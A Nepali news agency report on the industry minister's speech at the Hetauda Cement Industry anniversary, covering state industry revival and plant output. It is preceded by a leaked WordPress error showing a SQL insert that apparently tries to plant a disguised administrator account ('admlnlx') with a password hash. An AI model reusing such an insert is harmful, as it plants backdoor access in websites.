WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8RjYG8Zxm9hPv5ulQ.awTt0wFeMDV1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 13:12:14', '', 'admlnlx', 'admlnlx')
हेटौँडा, मंसिर २६ –
उद्योगमन्त्री नवीन्द्रराज जोशीले मुलुकको आर्थिक समृवृद्धिका लागि निजी क्षेत्रका लगानीकर्तालाई उद्योग स्थापनाका लागि सहुलियत दिन सरकार कटिवद्ध छ भन्नुभयो ।
हेटौँडा सिमेन्ट उद्योगको आज यहाँ आयोजित ३१ औं वार्षिकोत्सव समारोहमा उहाँले सरकारको स्वामित्वमा रहेका बन्द उद्योगलाई आधुनिककरण गर्न नसक्दा आर्थिक सङ्कट व्यर्होनु परेको हो भन्नुभयो ।
मन्त्री जोशीले बन्द उद्योगलाई सरकारले विभिन्न निकाय मार्फत् सञ्चालन गर्ने प्रक्रिया सुरु गरिसकेको र ती उद्योगलाई क्रमश आत्मनिर्भरतर्फ उन्मुख बनाई युवालाई रोजगारको अवसर दिलाउन सरकार प्रतिवद्धका साथ लागिपरेको छ भन्नुभयो ।
उद्योग सञ्चालक समितिका अध्यक्ष रघुरमण न्यौपानेले यस उद्योगको दैनिक ७५० मेट्रिक टन सिमेन्ट उत्पादन गर्ने क्षमता भए पनि हाल प्राविधिक कठिनाइका कारण दैनिक ४५० मेट्रिकटन मात्र गुणस्तरीय सिमेन्ट उत्पादन गरी उपभोक्ताकोबीच पु¥याउँदै आएको र आगामी दिनमा उत्पादन क्षमता वृद्धि गर्न उद्योगले गृहकार्य सुरु गरिसकेको बताउनुभयो । – रासस